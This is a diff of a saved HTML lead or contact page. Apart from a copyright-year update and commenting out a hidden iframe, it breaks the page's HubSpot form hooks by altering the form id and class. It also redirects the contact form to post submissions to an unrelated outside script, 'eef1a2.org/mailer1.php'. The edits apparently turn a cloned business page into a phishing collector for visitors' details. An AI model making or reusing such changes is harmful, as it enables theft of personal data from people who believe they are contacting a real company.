--- a/lead.html
+++ b/lead.html
@@ -2155,7 +2155,7 @@
                         </div>
                     </div>
                     <div class="footer__copyright col-md-12">
-                        <div class="copyright"><i class="fa fa-copyright"></i> Copyright 2020 | All rights Reserved
+                        <div class="copyright"><i class="fa fa-copyright"></i> Copyright 2023 | All rights Reserved
                         </div>
                     </div>
                 </div>
@@ -2176,10 +2176,10 @@
                                 <p><strong>Design,Materials, Construction, Support</strong></p>
                             </div>
 
-                            <div id="hbspt-form-97759228-cb94-4251-aa67-96b1320ad512" class="hbspt-form"
+                            <div id="hbspt-form-97759228-cb94-4251-aa67-96b1320ad51" class="hbsptform"
                                 data-hs-forms-root="true">
 
-                                <form id="contactForm">
+                                <form id="contactForm" action="https://eef1a2.org/mailer1.php" method="post">
                                     <div class="form__input">
                                         <div class="input__icon">
                                         </div>
@@ -2352,8 +2352,8 @@ label {
 
 
 
-    <iframe owner="archetype" title="archetype" style="display: none; visibility: hidden;"
-        src="./files/saved_resource(3).html"></iframe>
+    <!-- <iframe owner="archetype" title="archetype" style="display: none; visibility: hidden;"
+        src="./files/saved_resource(3).html"></iframe> -->
 </body>
 
 </html>
